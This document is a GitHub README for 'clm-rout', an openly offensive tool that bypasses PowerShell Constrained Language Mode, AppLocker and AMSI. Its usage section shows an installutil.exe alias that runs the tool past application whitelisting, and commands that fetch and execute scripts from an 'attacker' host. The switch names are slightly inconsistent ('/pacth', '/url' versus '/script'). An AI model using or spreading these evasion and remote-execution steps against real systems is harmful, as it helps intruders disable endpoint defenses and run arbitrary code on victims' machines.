An all-in-one bypass for PowerShell Constrained Language Mode
(CLM
), AppLocker
and Antimalware Scan Interface
(AMSI
) using Runspace.
- Evade
AppLocker
. - Evade
CLM
. - Patch
AMSI
via the/pacth
command switch. - Execute command(s) via the
/cmd=<cmd>
command switch. - Load and execute remotely hosted script(s) via the
/url=<http(s)://foo.bar/foobar>
command switch. - Output the results of commands/scripts (supports
stdout
andstderr
).
-
Clone/download
clm-rout
:git clone https://github.com/aress31/clm-rout
-
Build the project with
Visual Studio 2022
.
- (Recommended) Create an "alias":
function run {
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe `
/uninstall /logfile= /LogToConsole=false `
/patch $Args `
C:\users\foo\CLMRout.exe
}
-
Execute command(s):
run /cmd="hostname; whoami"
-
Execute remote script(s):
run /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
-
Execute remote script(s) followed by command(s):
run /cmd="hostname; whoami" /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee โ/lamborghini ๐) - as a lot of my personal time went into creating this project. ๐ช
It is easy, all you got to do is press the Sponsor
button at the top of this page or alternatively click this link. ๐
Found a bug ๐? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project? ๐คฉ
Please submit all PRs
on the GitHub pull requests tracker.
clm-rout
is distributed under the terms of the BSD 3
.
See LICENSE for details.